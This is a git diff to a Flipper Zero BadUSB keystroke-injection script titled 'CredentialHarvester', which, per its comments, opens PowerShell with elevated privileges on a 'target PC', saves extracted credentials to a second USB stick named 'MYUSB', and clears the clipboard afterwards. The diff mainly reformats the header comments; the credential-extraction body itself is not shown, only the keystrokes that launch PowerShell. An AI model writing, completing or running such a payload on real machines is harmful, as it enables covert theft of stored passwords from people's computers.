diff --git a/0. CredentialHarvester b/0. CredentialHarvester index 1821f1a..1841b07 100644 --- a/0. CredentialHarvester +++ b/0. CredentialHarvester @@ -1,11 +1,13 @@ -REM This script was created by github.com/markcyber -REM This script requires a secondary USB named "MYUSB" to save credentials to -REM The extracted data will require decryption +REM ############################################################################################################## +REM ################# This script was created by github.com/markcyber ############# +REM ################# This script requires a secondary USB named "MYUSB" to save credentials to ############# +REM ################# The extracted data will require decryption ############# +REM ################# Set delay for Flipper Zero ############# +REM ############################################################################################################## -REM Set delay for Flipper Zero -DELAY 1000 REM Open PowerShell with elevated privileges +DELAY 1000 GUI r DELAY 500 STRING powershell @@ -49,7 +51,7 @@ STRING } ENTER DELAY 500 -REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC) +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) STRING echo off | clip ENTER DELAY 500